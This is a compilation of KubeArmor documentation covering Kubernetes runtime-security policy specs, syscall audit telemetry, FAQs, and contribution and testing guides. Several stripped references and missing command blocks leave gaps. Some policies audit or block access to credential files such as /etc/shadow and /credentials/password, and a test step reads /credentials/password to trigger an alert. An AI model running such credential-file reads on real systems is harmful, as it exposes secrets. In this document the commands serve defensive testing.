  "ContainerName": "nginx",
  "ContainerImage": "nginx:latest@sha256:b95a99feebf7797479e0c5eb5ec0bdfa5d9f504bc94da550c2f58e839ea6914f",
  "HostPPID": 255296,
  "HostPID": 296264,
  "PPID": 47,
  "PID": 65,
  "ParentProcessName": "/bin/bash",
  "ProcessName": "/usr/bin/unlink",
  "PolicyName": "audit-all-unlink",
  "Severity": "3",
  "Type": "MatchedPolicy",
  "Source": "/usr/bin/unlink home/secret.txt",
  "Operation": "Syscall",
  "Resource": "/home/secret.txt",
  "Data": "syscall=SYS_UNLINK",
  "Action": "Audit",
  "Result": "Passed"
}
  • Alert on all rmdir syscalls targeting anything in /home/ directory and sub-directories

    apiVersion: security.kubearmor.com/v1
    kind: KubeArmorPolicy
    metadata:
      name: audit-home-rmdir
      namespace: default
    spec:
      selector:
        matchLabels:
          container: ubuntu-1
      syscalls:
        matchPaths:
        - syscall:
          - rmdir
          path: /home/
          recursive: true
      action:
        Audit
Generated telemetry
{
  "Timestamp": 1661936575,
  "UpdatedTime": "2022-08-31T09:02:55.841537Z",
  "ClusterName": "default",
  "HostName": "vagrant",
  "NamespaceName": "default",
  "PodName": "ubuntu-1-6779f689b5-jjcvh",
  "Labels": "container=ubuntu-1",
  "ContainerID": "1f613df8390b9d2e4e89d0323ac0b9a2e7d7ddcc460720e15074f8c497aec0df",
  "ContainerName": "nginx",
  "ContainerImage": "nginx:latest@sha256:b95a99feebf7797479e0c5eb5ec0bdfa5d9f504bc94da550c2f58e839ea6914f",
  "HostPPID": 255296,
  "HostPID": 302715,
  "PPID": 47,
  "PID": 67,
  "ParentProcessName": "/bin/bash",
  "ProcessName": "/bin/rmdir",
  "PolicyName": "audit-home-rmdir",
  "Severity": "1",
  "Type": "MatchedPolicy",
  "Source": "/bin/rmdir home/jane-doe/",
  "Operation": "Syscall",
  "Resource": "/home/jane-doe",
  "Data": "syscall=SYS_RMDIR",
  "Action": "Audit",
  "Result": "Passed"
}

Contribution Guide

KubeArmor maintainers welcome individuals and organizations from across the cloud security landscape (creators and implementers alike) to make contributions to the project. We equally value the addition of technical contributions and enhancements of documentation that helps us grow the community and strengthen the value of KubeArmor. We invite members of the community to contribute to the project!

To make a contribution, please follow the steps below.

  1. Fork this repository (KubeArmor)

    First, fork this repository by clicking on the Fork button (top right).

    Then, click your ID on the pop-up screen.

    This will create a copy of KubeArmor in your account.

  2. Clone the repository

    Now clone KubeArmor locally into your dev environment.

     $ git clone https://github.com/[your GitHub ID]/KubeArmor

    This will create a local copy of KubeArmor in your dev environment.

  3. Make changes

    First, go into the repository directory and make some changes.

  4. Check the changes

    If you have changed the core code of KubeArmor, then please run tests before committing the changes:

     $ cd KubeArmor/tests
     ~/KubeArmor/tests$ make

    If you see any warnings or errors, please fix them first.

  5. Commit changes

    Please see your changes using "git status" and add them to the branch using "git add".

     $ cd KubeArmor
     ~/KubeArmor$ git status
     ~/KubeArmor$ git add [changed file]

    Then, commit the changes using the "git commit" command.

     ~/KubeArmor$ git commit -s -m "Add a new feature by [your name]"

    Please make sure that your changes are properly tested on your machine.

  6. Push changes to your forked repository

    Push your changes using the "git push" command.

     ~/KubeArmor$ git push
  7. Create a pull request with your changes with the following steps

    First, go to your repository on GitHub.

    Then, click "Pull request" button.

    After checking your changes, click 'Create pull request'.

    A pull request should describe the changes of all commits in as much detail as possible and reference the related issue, e.g., "Fixes: #(issue number)".

    Finally, click the "Create pull request" button.

    The changes will be merged after a review by the respective module owners. Once the changes are merged, you will get a notification, and the corresponding issue will be closed.

  8. DCO Signoffs

    To ensure that contributors are only submitting work that they have rights to, we are requiring everyone to acknowledge this by signing their work. Any copyright notices in this repo should specify the authors as "KubeArmor authors".

    To sign your work, just add a line like this at the end of your commit message:

    Signed-off-by: FirstName LastName <email@address.com>

    This can easily be done with the -s or --signoff option to git commit.

    By doing this, you state that the source code being submitted originated from you (see https://developercertificate.org).

FAQs

How to get process events in the context of a specific pod?

The following command can be used to get pod-specific events:

karmor log --pod <pod_name>

karmor log has the following filters to provide more granularity:

--container - Specify container name for container specific logs
--logFilter <system|policy|all> - Filter to either receive system logs or alerts on policy violation
--logType <ContainerLog|HostLog> - Source of logs - ContainerLog: logs from containers or HostLog: logs from the host
--namespace - Specify the namespace for the running pods
--operation <Process|File|Network> - Type of logs based on process, file or network
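
For example, to stream only file-related policy alerts for a particular pod (the pod and namespace names here are hypothetical placeholders):

karmor log --pod mypod --namespace default --logFilter policy --operation File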
How is KubeArmor different from admission controllers?

Kubernetes admission controllers are a set of extensions that act as a gatekeeper and help govern and control Kubernetes clusters. They intercept requests to the Kubernetes API server prior to the persistence of the object into etcd.

They can manage deployments requesting too many resources, enforce pod security policies, prevent vulnerable images from being deployed, and check if the pod is running in privileged mode. But all these checks are done before the pods are started. Admission controllers don't guarantee any protection once the vulnerability is inside the cluster.

KubeArmor protects the pods from within. It runs as a daemonset and restricts the behavior of containers at the system level. KubeArmor allows one to define security policies for the assets/resources (such as files, processes, volumes, etc.) within the pod/container, select them based on K8s metadata, and simply apply these security policies at runtime.

It also detects any policy violations and generates audit logs with container identities. Apart from containers, KubeArmor also allows protecting the host itself.

What are the Policy Actions supported by KubeArmor?

KubeArmor defines 3 policy actions: Allow, Block, and Audit.

Allow: A whitelist policy, i.e., a policy defined with the Allow action, permits only the operations defined in the policy; everything else is blocked or audited.
Block: A policy defined with the Block action blocks all the operations defined in the policy.
Audit: An applied Audit policy doesn't block any action but instead generates alerts on policy violation. This type of policy can be used as a "dry run" before safely applying a security policy in production.

If a Block policy is used and there is no supported enforcement mechanism on the platform, then policy enforcement won't be observed. However, observability data for the applied Block policy will still be available, which can help in identifying any suspicious activity.
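
As an illustration of the "dry run" workflow, here is a minimal sketch of an Audit policy (the policy name and the app: nginx label are hypothetical) that can be applied and observed before switching the action to Block:

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: audit-shadow-dry-run
  namespace: default
spec:
  selector:
    matchLabels:
      app: nginx
  file:
    matchPaths:
    - path: /etc/shadow
  action:
    Audit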

How to use KubeArmor on Oracle K8s engine?

KubeArmor supports enforcement on OKE by leveraging BPF-LSM. The default kernel for Oracle Linux 8.6 (OL 8.6) is UEK R6 (kernel-uek-5.4.17-2136.307.3), which does not support BPF-LSM.

Unbreakable Enterprise Kernel Release 7 (UEK R7) is based on Linux kernel 5.15 LTS, which supports BPF-LSM, and it is available for Oracle Linux 8 Update 5 onwards.

Installing UEK 7 on OL 8.6

Note: After upgrading to UEK R7, you may be required to enable BPF-LSM manually if it is not enabled by default.

Checking and Enabling support for BPF-LSM

Checking if BPF-LSM is supported in the Kernel

Check for BPF-LSM support in the kernel config:

cat /boot/config-$(uname -r) | grep -e "BPF" -e "BTF"

The following flags need to exist and be set to y:

CONFIG_BPF=y
CONFIG_BPF_SYSCALL=y
CONFIG_BPF_JIT=y
CONFIG_BPF_LSM=y
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_INFO_BTF=y

Note: These configs could be in other places too, such as /boot/config, /usr/src/linux-headers-$(uname -r)/.config, /lib/modules/$(uname -r)/config, or /proc/config.gz.
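
A convenience sketch to check all of these locations at once (this assumes zgrep is available, which transparently handles both plain and gzip-compressed files):

for f in /boot/config-$(uname -r) /boot/config /proc/config.gz \
         /usr/src/linux-headers-$(uname -r)/.config /lib/modules/$(uname -r)/config; do
  # Print the file name and its BPF/BTF flags if the file exists
  [ -e "$f" ] && echo "== $f" && zgrep -e "BPF" -e "BTF" "$f" 2>/dev/null
done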

Checking if BPF-LSM is enabled

  • Check if bpf is enabled by verifying that it appears in the list of active LSMs:

    $ cat /sys/kernel/security/lsm
    capability,yama,selinux,bpf

    As we can see here, bpf is among the active LSMs.

Enabling BPF-LSM manually using boot configs

  • Open the /etc/default/grub file in privileged mode.

    sudo vi /etc/default/grub
  • Append the following to the GRUB_CMDLINE_LINUX variable and save.

    GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
  • Update grub config:

    # On Debian like systems
    sudo update-grub

    OR

    # On RHEL like systems
    sudo grub2-mkconfig -o /boot/grub2.cfg
  • Reboot into your kernel.

    sudo reboot
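
After the reboot, you can confirm that the change took effect; based on the GRUB_CMDLINE_LINUX value above, bpf should now appear in the list of active LSMs:

$ cat /sys/kernel/security/lsm
lockdown,capability,yama,apparmor,bpf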
ICMP block/audit does not work with AppArmor as the enforcer

There is a known issue with AppArmor due to which ICMP rules don't work as expected.

In the same environment, we've found that ICMP rules work as expected with BPF-LSM.

How to enable `KubeArmorHostPolicy` for k8s cluster?

By default, host policies and host visibility are disabled for k8s hosts.

If you run kubectl logs -n kubearmor <KUBEARMOR-POD> | grep "Started to protect" and see 2023-08-21 12:58:34.641665 INFO Started to protect containers, then only container/pod protection is enabled. If the host policy is enabled, you should see something like 2023-08-22 18:07:43.335232 INFO Started to protect a host and containers.

One can enable the host policy by patching the daemonset (kubectl edit daemonsets.apps -n kubearmor kubearmor):

...
  template:
    metadata:
      annotations:
        container.apparmor.security.beta.kubernetes.io/kubearmor: unconfined
      creationTimestamp: null
      labels:
        kubearmor-app: kubearmor
    spec:
      containers:
      - args:
        - -gRPC=32767
+       - -enableKubeArmorHostPolicy
+       - -hostVisibility=process,file,network,capabilities
        env:
        - name: KUBEARMOR_NODENAME
          valueFrom:
            fieldRef:
              apiVersion: v1
              fieldPath: spec.nodeName
...

This will enable the KubeArmorHostPolicy and host based visibility for the k8s worker nodes.
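
To confirm that the change took effect across all KubeArmor pods (using the kubearmor-app=kubearmor label from the daemonset above):

kubectl logs -n kubearmor -l kubearmor-app=kubearmor | grep "Started to protect"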

Using KubeArmor with Kind clusters

KubeArmor works out of the box with Kind clusters supporting BPF-LSM. However, in AppArmor-only mode, a Kind cluster needs additional provisioning steps. You can check whether BPF-LSM is supported/enabled on your host (on which the Kind cluster is to be deployed) by using the following:

cat /sys/kernel/security/lsm
  • If it has bpf in the list, then everything should work out of the box

  • If it has apparmor in the list, then follow the steps mentioned in this FAQ.

1. Create Kind cluster

cat <<EOF | kind create cluster --config -
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- extraMounts:
  - hostPath: /sys/kernel/security
    containerPath: /sys/kernel/security
EOF

2. Exec into kind node & install apparmor util

docker exec -it kind-control-plane bash -c "apt update && apt install apparmor-utils -y && systemctl restart containerd"

The above command installs the AppArmor utilities in kind-control-plane. The same command can also be used in minikube as well as in all the other Docker-based Kubernetes environments.

Apart from dockerized Kubernetes environments, AppArmor might also be unavailable on the master node itself in a Kubernetes cluster. To check, run the command below to look for AppArmor support in the kernel config:

cat /boot/config-$(uname -r) | grep -e "APPARMOR"

The following flag needs to exist and be set to y:

CONFIG_SECURITY_APPARMOR=y

If the flag is set but the AppArmor utilities are missing, install them on the master node:

apt update && apt install apparmor-utils -y

Then restart your container runtime (CRI) in order to make AppArmor available for enforcement.

If the kubearmor-relay pod goes into CrashLoopBackOff, apply the following patch:

kubectl patch deploy -n $(kubectl get deploy -l kubearmor-app=kubearmor-relay -A -o custom-columns=:'{.metadata.namespace}',:'{.metadata.name}') --type=json -p='[{"op": "add", "path": "/spec/template/metadata/annotations/container.apparmor.security.beta.kubernetes.io~1kubearmor-relay-server", "value": "unconfined"}]'
KubeArmor enforcement is not enabled/working

KubeArmor enforcement mode requires support of LSMs on the hosts. Certain distributions might not enable it out of the box. There are two ways to check this:

  1. During KubeArmor installation, it shows the following warning message:

KubeArmor is running in Audit mode, only Observability will be available and Policy Enforcement won't be available.
  2. Another way to check is by using karmor probe. If the Active LSM shown is blank, then enforcement won't work.

The following updater daemonset will enable the required LSM on the nodes (if new nodes are dynamically added in the future, they will be auto-enabled as well).

kubectl apply -f https://raw.githubusercontent.com/kubearmor/KubeArmor/main/deployments/controller/ka-updater-kured.yaml

Note: Nodes that do not have the necessary LSM will be restarted after the updater is deployed.

Once the nodes are restarted, karmor probe will show Active LSM with an appropriate value.

KubeArmor with WSL2

It is possible to deploy k3s on WSL2 to have a local cluster on your Windows machine. However, the WSL2 environment does not mount securityfs by default, and hence /sys/kernel/security is not available. KubeArmor will still install on such a system, but without enforcement logic.

Thus, with k3s on WSL2, you can still run KubeArmor, but block-based policies won't work. karmor probe will show Active LSM as blank, which signals that block-based policies won't work.

Testing Guide

There are two ways to check the functionalities of KubeArmor: 1) testing KubeArmor manually and 2) using the testing framework.

0. Make sure the Kubernetes cluster is running

0.1. First, run 'kubectl proxy' in the background

$ kubectl proxy &

0.2. Now run KubeArmor

~/KubeArmor/KubeArmor$ make run

1. Test KubeArmor manually

1.1. Run 'kubectl proxy' in background

$ kubectl proxy &

1.2. Compile KubeArmor

$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make clean && make

1.3. Run KubeArmor

~/KubeArmor/KubeArmor$ sudo -E ./kubearmor -gRPC=[gRPC port number]
                                           -logPath=[log file path]
                                           -enableKubeArmorPolicy=[true|false]
                                           -enableKubeArmorHostPolicy=[true|false]

1.4. Apply security policies into Kubernetes

Beforehand, check if the KubeArmorPolicy and KubeArmorHostPolicy CRDs are already applied.

$ kubectl explain KubeArmorPolicy

If they are still not applied, do so.

$ kubectl apply -f ~/KubeArmor/deployments/CRD/

Now you can apply specific policies.

$ kubectl apply -f [policy file]

1.5. Trigger policy violations to generate alerts

$ kubectl -n [namespace name] exec -it [pod name] -- bash -c [command]
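
For example, with the multiubuntu demo and the file access policy from the examples above applied, accessing a blocked file should fail (the pod name is a placeholder):

$ kubectl -n multiubuntu exec -it [ubuntu-5 pod name] -- bash -c "cat /credentials/password"
cat: /credentials/password: Permission denied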

1.6. Check generated alerts

  • $ karmor log [flags]

    flags:

    --gRPC string        gRPC server information
    --help               help for log
    --json               Flag to print alerts and logs in the JSON format
    --logFilter string   What kinds of alerts and logs to receive, {policy|system|all} (default "policy")
    --logPath string     Output location for alerts and logs, {path|stdout|none} (default "stdout")
    --msgPath string     Output location for messages, {path|stdout|none} (default "none")

    Note that alerts and logs are shown right after karmor log starts running; thus, we recommend running the above command in another terminal to watch logs live.
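
    For instance, to watch everything (both system logs and policy alerts) in JSON format, using the flags listed above:

    karmor log --json --logFilter all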

2. Test KubeArmor using the auto-testing framework

  • The case where KubeArmor is running directly on a host

    Compile KubeArmor

    $ cd KubeArmor/KubeArmor
    ~/KubeArmor/KubeArmor$ make clean && make

    Run the auto-testing framework

    $ cd KubeArmor/tests
    ~/KubeArmor/tests$ ./test-scenarios-local.sh

    Check the test report

    ~/KubeArmor/tests$ cat /tmp/kubearmor.test
  • The case where KubeArmor is running as a daemonset in Kubernetes

    Run the testing framework

    $ cd KubeArmor/tests
    ~/KubeArmor/tests$ ./test-scenarios-in-runtime.sh

    Check the test report

    ~/KubeArmor/tests$ cat /tmp/kubearmor.test
  • To run a specific suite of tests, move to the directory of the test and run

    ~/KubeArmor/tests/test_directory$ ginkgo --focus "Suite_Name"

Policy Spec for Nodes/VMs

Policy Specification

Here is the specification of a host security policy.

apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: [policy name]

spec:
  severity: [1-10]                         # --> optional 
  tags: ["tag", ...]                       # --> optional
  message: [message]                       # --> optional

  nodeSelector:
    matchLabels:
      [key1]: [value1]
      [keyN]: [valueN]

  process:
    matchPaths:
    - path: [absolute executable path]
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchPatterns:
    - pattern: [regex pattern]
      ownerOnly: [true|false]              # --> optional

  file:
    matchPaths:
    - path: [absolute file path]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute executable path]
    matchPatterns:
    - pattern: [regex pattern]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional

  network:
    matchProtocols:
    - protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
      fromSource:
      - path: [absolute executable path]

  capabilities:
    matchCapabilities:
    - capability: [capability name]
      fromSource:
      - path: [absolute executable path]

  action: [Audit|Block] (Block by default)

Note: Please note that for system call monitoring, we only support the Audit action no matter what the value of action is.

Policy Spec Description

Now, we will briefly explain how to define a host security policy.

  • Common

    A security policy starts with the base information such as apiVersion, kind, and metadata. The apiVersion and kind would be the same in any security policies. In the case of metadata, you need to specify the name of a policy.

      apiVersion: security.kubearmor.com/v1
      kind: KubeArmorHostPolicy
      metadata:
        name: [policy name]

    Make sure to use KubeArmorHostPolicy, not KubeArmorPolicy.

  • Severity

    You can specify the severity of a given policy from 1 to 10. This severity will appear in alerts when policy violations happen.

    severity: [1-10]
  • Tags

    The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.

    tags: ["tag1", ..., "tagN"]
  • Message

    The message part is optional. You can add an alert message, and then the message will be presented in alert logs.

    message: [message]
  • NodeSelector

    The node selector part is relatively straightforward. Similar to other Kubernetes configurations, you can specify (a group of) nodes based on labels.

      nodeSelector:
        matchLabels:
          [key1]: [value1]
          [keyN]: [valueN]

    If you do not have any custom labels, you can use system labels as well.

        kubernetes.io/arch: [architecture, (e.g., amd64)]
        kubernetes.io/hostname: [host name, (e.g., kubearmor-dev)]
        kubernetes.io/os: [operating system, (e.g., linux)]
  • Process

    In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. In the case of matchPatterns, advanced operators may be able to define particular patterns for executables by using regular expressions. However, we generally do not recommend using this match.

      process:
        matchPaths:
        - path: [absolute executable path]
          ownerOnly: [true|false]            # --> optional
          fromSource:                        # --> optional
          - path: [absolute executable path]
        matchDirectories:
        - dir: [absolute directory path]
          recursive: [true|false]            # --> optional
          ownerOnly: [true|false]            # --> optional
          fromSource:                        # --> optional
          - path: [absolute executable path]
        matchPatterns:
        - pattern: [regex pattern]
          ownerOnly: [true|false]            # --> optional

    In each match, there are three options.

    • ownerOnly (static action: allow owner only; otherwise block all)

      If this is enabled, only the owners of the executable(s) defined with matchPaths and matchDirectories will be allowed to execute them.

    • recursive

      If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.

    • fromSource

      If a path is specified in fromSource, only the executable at that path will be allowed (or blocked) to execute the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy as follows. Then, /bin/bash will be the only program allowed (or blocked) to execute /bin/sleep; otherwise, the execution of /bin/sleep will be blocked (or allowed).

        process:
          matchPaths:
          - path: /bin/sleep
            fromSource:
            - path: /bin/bash
  • File

    The file section is quite similar to the process section.

      file:
        matchPaths:
        - path: [absolute file path]
          readOnly: [true|false]             # --> optional
          ownerOnly: [true|false]            # --> optional
          fromSource:                        # --> optional
          - path: [absolute file path]
        matchDirectories:
        - dir: [absolute directory path]
          recursive: [true|false]            # --> optional
          readOnly: [true|false]             # --> optional
          ownerOnly: [true|false]            # --> optional
          fromSource:                        # --> optional
          - path: [absolute file path]
        matchPatterns:
        - pattern: [regex pattern]
          readOnly: [true|false]             # --> optional
          ownerOnly: [true|false]            # --> optional

    The only difference between 'process' and 'file' is the readOnly option.

    • readOnly (static action: allow to read only; otherwise block all)

      If this is enabled, only the read operation will be allowed, and any other operations (e.g., write) will be blocked.

  • Network

    In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.

      network:
        matchProtocols:
        - protocol: [protocol(,)]            # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
          fromSource:
          - path: [absolute file path]
  • Capabilities

      capabilities:
        matchCapabilities:
        - capability: [capability name(,)]
          fromSource:
          - path: [absolute file path]
  • Syscalls

    In the case of syscalls, there are two types of matches: matchSyscalls and matchPaths. matchPaths can be used to target system calls aimed at a specific binary path or at anything under a specific directory; additionally, you can slice based on syscalls generated by a binary or a group of binaries in a directory. You can use matchSyscalls as a more general rule to match syscalls from all sources or from specific binaries.

syscalls:
  matchSyscalls:
  - syscall:
    - syscallX
    - syscallY
    fromSource:                            # --> optional
    - path: [absolute executable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
  matchPaths:
  - syscall:
    - syscallX
    - syscallY
    path: [absolute directory path | absolute executable path]
    recursive: [true|false]                # --> optional
    fromSource:                            # --> optional
    - path: [absolute executable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional

There are two options in each match.

  • fromSource

    If a path is specified in fromSource, KubeArmor will match only syscalls generated by the defined source. For better understanding, let's take the example below. Only unlink system calls targeting /bin/sleep and generated by /bin/bash will be matched.

      syscalls:
        matchPaths:
        - syscall:
          - unlink
          path: /bin/sleep
          fromSource:
          - path: /bin/bash
  • recursive

    If this is enabled, the coverage will extend to the subdirectories of the directory.

  • Action

    The action could be Audit or Block in general. In order to use the Allow action, you should define 'fromSource'; otherwise, all Allow actions will be ignored by default.

      action: [Audit|Block]

    If 'fromSource' is defined, we can use all actions for specific rules.

      action: [Allow|Audit|Block]

    For system call monitoring, we only support the Audit action no matter what the action is set to.
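
    For example, a minimal sketch (the policy name here is hypothetical; the semantics follow the fromSource description above) where only /bin/bash is allowed to execute /usr/bin/diff on the node:

      apiVersion: security.kubearmor.com/v1
      kind: KubeArmorHostPolicy
      metadata:
        name: hsp-allow-diff-from-bash
      spec:
        nodeSelector:
          matchLabels:
            kubernetes.io/hostname: kubearmor-dev
        process:
          matchPaths:
          - path: /usr/bin/diff
            fromSource:
            - path: /bin/bash
        action:
          Allow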

Policy Examples for Nodes/VMs

Here, we demonstrate how to define host security policies.

  • Process Execution Restriction

      • Explanation: The purpose of this policy is to block the execution of '/usr/bin/diff' in a host whose host name is 'kubearmor-dev'. For this, we define 'kubernetes.io/hostname: kubearmor-dev' in nodeSelector -> matchLabels and the specific path ('/usr/bin/diff') in process -> matchPaths. Also, we put 'Block' as the action of this policy.

      • Verification: After applying this policy, please open a new terminal (or connect to the host with a new session) and run '/usr/bin/diff'. You will see that /usr/bin/diff is blocked.

      NOTE

      The given policy works with almost every Linux distribution. If it is not working in your case, check the process location. The following shows the location of the sleep binary in different Ubuntu distributions:

      • In case of Ubuntu 20.04 : /usr/bin/sleep

      • In case of Ubuntu 18.04 : /bin/sleep

  • File Access Restriction

      • Explanation: The purpose of this policy is to audit any accesses to a critical file (i.e., '/etc/passwd'). Since we want to audit one critical file, we use matchPaths to specify the path of '/etc/passwd'.

      • Verification: After applying this policy, please open a new terminal (or connect to the host with a new session) and run 'sudo cat /etc/passwd'. Then, check the alert logs of KubeArmor.

  • System calls alerting

    • Alert for all unlink syscalls

Generated telemetry
  • Alert on all rmdir syscalls targeting anything in /home/ directory and sub-directories

Generated telemetry

Development Guide

Development

1. Vagrant Environment (Recommended)

  • Requirements

    Here is the list of requirements for a Vagrant environment

    Clone the KubeArmor github repository in your system

    Install Vagrant and VirtualBox in your environment, go to the vagrant path and run the setup.sh file

  • VM Setup using Vagrant

    Now, it is time to prepare a VM for development.

    To create a vagrant VM

    Output will show up as ...

    To get into the vagrant VM

    Output will show up as ...

    To destroy the vagrant VM

    • VM Setup using Vagrant with Ubuntu 21.10 (v5.13)

      To use the recent Linux kernel v5.13 for dev env, you can run make with the NETNEXT flag set to 1 for the respective make option.

      You can also make the setting static by changing NETNEXT=0 to NETNEXT=1 in the Makefile.

2. Self-managed Kubernetes

  • Requirements

    Here is the list of minimum requirements for self-managed Kubernetes.

    Alternative Setup

    You can try the following alternative if you face any difficulty in the above Kubernetes (kubeadm) setup.

    Note Please make sure to set up the alternative k8s environment on the same host where the KubeArmor development environment is running.

    • K3s

    • MicroK8s

    • No Support - Docker Desktops

      KubeArmor does not work with Docker Desktops on Windows and macOS because KubeArmor integrates with Linux-kernel native primitives (including LSMs).

  • Development Setup

    In order to install all dependencies, please run the following command.

    Now, you are ready to develop any code for KubeArmor. Enjoy your journey with KubeArmor.

3. Environment Check

  • Compilation

    Check if KubeArmor can be compiled on your environment without any problems.

    If you see any error messages, please let us know the issue with the full error messages through the #kubearmor-development channel on CNCF slack.

  • Execution

    In order to directly run KubeArmor in a host (not as a container), you need to run a local proxy in advance.

    Then, run KubeArmor on your environment.

    Note If you have followed all the above steps and still getting the warning The node information is not available, then this could be due to the case-sensitivity discrepancy in the actual hostname (obtained by running hostname) and the hostname used by Kubernetes (under kubectl get nodes -o wide). K8s converts the hostname to lowercase, which results in a mismatch with the actual hostname. To resolve this, change the hostname to lowercase using the command hostnamectl set-hostname <lowercase-hostname>.
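
    For example (the mixed-case hostname below is hypothetical):

    $ hostname
    KubeArmor-Dev
    $ sudo hostnamectl set-hostname kubearmor-dev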

  • KubeArmor Controller

    Starting from KubeArmor v0.11, annotations, container policies, and host policies are handled via the KubeArmor controller; the controller code can be found under pkg/KubeArmorController.

    To install the controller from KubeArmor docker repository run

    To install the controller (local version) to your cluster run

    If you need to set up a local registry to push your image, use the docker-registry.sh script under the ~/KubeArmor/contribution/local-registry directory.

Code Directories

Here, we briefly give you an overview of KubeArmor's directories.

  • Source code for KubeArmor (/KubeArmor)

  • Source code for KubeArmor Controller (CRD)

  • Deployment tools and files for KubeArmor

  • Files for testing

In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. In the case of matchPatterns, advanced operators may be able to determine particular patterns for executables by using regular expressions. However, the coverage of regular expressions is highly dependent on AppArmor (). Thus, we generally do not recommend using this match.

In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check available capabilities in .

The action could be Allow, Audit, or Block. Security policies would be handled in a blacklist manner or a whitelist manner according to the action. Thus, you need to define the action carefully. You can refer to for more details. In the case of the Audit action, we can use this action for policy verification before applying a security policy with the Block action. For System calls monitoring, we only support audit mode no matter what the action is set to.

Block a specific executable - In operator ()

Block a specific executable - NotIn operator()

Block a specific executable matching labels, In operator- In operator ()

Block accessing specific executable matching labels, NotIn operator ()

Block accessing specific file ()

Block a specific executable ()

Block accessing specific executable matching labels, In & NotIn operator ()

Block accessing specific executable matching labels, NotIn operator ()

Block all executables in a specific directory ()

Block all executables in a specific directory and its subdirectories ()

Allow specific executables to access certain files only ()

Allow a specific executable to be launched by its owner only ()

Allow accessing specific files only ()

Block all file accesses in a specific directory and its subdirectories ()

Audit ICMP packets ()

Block Raw Sockets (i.e., non-TCP/UDP packets) ()

Please refer to to set up your environment for KubeArmor contribution.

If some tests are failing, then fix them by following

If you have made changes in Operator or Controller, then follow

What platforms are supported by KubeArmor? How can I check whether my deployment will be supported?
  • Please check .

  • Use karmor probe to check if the platform is supported.

I am applying a blocking policy but it is not blocking the action. What can I check?

Checkout Binary Path

If the path in your process rule is not an absolute path but a symlink, policy enforcement won't work. This is because KubeArmor sees the actual executable path in events received from kernel space and is not aware of symlinks.

Policy enforcement on symbolic links like /usr/bin/python doesn't work and one has to specify the path of the actual executable that they link to.
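
A quick way to find the actual executable behind a symlink (the resolved path below is illustrative and will vary by system):

$ readlink -f /usr/bin/python
/usr/bin/python3.8

Use the resolved path (here, /usr/bin/python3.8) in the process rule instead of the symlink.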

Checkout Platform Support

Check karmor probe output and check whether Container Security is false. If it is false, the KubeArmor enforcement is not supported on that platform. You should check the and if the platform is not listed there then raise a new issue or connect to kubearmor community of .

Checkout Default Posture

If you are applying Allow-based policies and expecting unknown actions to be blocked, please make sure to check the . The default security posture is set to Audit since KubeArmor v0.7.
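
If you want unknown operations to be denied instead, one way to tighten the posture for a namespace is via annotations (a hedged sketch; the namespace name is hypothetical, and the full set of posture annotations is described in the default security posture docs):

kubectl annotate ns default kubearmor-file-posture=block --overwrite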

How is KubeArmor different from PodSecurityPolicy/PodSecurityContext?

Native k8s supports specifying a security context for the pod or container. It requires one to specify native AppArmor, SELinux, or seccomp policies. But there are a few problems with this approach:

  • Not all OS distributions support the LSMs consistently. For example, supports AppArmor while supports SELinux and BPF-LSM.

  • The Pod Security Context expects the security profile to be specified in its native language: for instance, an AppArmor profile for AppArmor, or an SELinux profile if SELinux is to be used. The profile language is extremely complex, and this complexity could backfire, i.e., it could lead to security holes.

  • Security Profile updates are manual and difficult: When an app is updated, the security posture might change and it becomes difficult to manually update the native rules.

  • No alerting of LSM violation on managed cloud platforms: By default LSMs send logs to kernel auditd, which is not available on most managed cloud platforms.

KubeArmor solves all the above mentioned problems.

  • It maps YAML rules to LSM (AppArmor, BPF-LSM) rules, so prior knowledge of the different security contexts (native AppArmor, SELinux) is not required.

  • It's easy to deploy: KubeArmor is deployed as a daemonset. Even when the application is updated, the enforcement rules are automatically applied.

  • Consistent Alerting: KubeArmor handles kernel events and maps k8s metadata using eBPF.

  • KubeArmor also runs in systemd mode, so it can directly run on and protect virtual machines or bare-metal machines too.

  • Pod Security Context cannot leverage BPF-LSM at all today. BPF-LSM provides more programmatic control over the policy rules.

  • Pod Security Context does not manage abstractions. As an example, you might have two nodes with Ubuntu and two nodes with Bottlerocket. Ubuntu by default has AppArmor, while Bottlerocket has BPF-LSM and SELinux. KubeArmor internally picks the right primitives to use for enforcement, and the user does not have to explicitly state what to use.

What is visibility that I hear of in KubeArmor and how to get visibility information?

KubeArmor, apart from being a policy enforcement engine, also emits pod/container visibility data. It uses an eBPF-based system monitor which keeps track of process life cycles in containers and even nodes, and converts system metadata to container/node identities. This information can then be used for observability use-cases.

Sample output of karmor logs --json:

{
  "Timestamp": 1639803960,
  "UpdatedTime": "2021-12-18T05:06:00.077564Z",
  "ClusterName": "Default",
  "HostName": "pandora",
  "HostPID": 3390423,
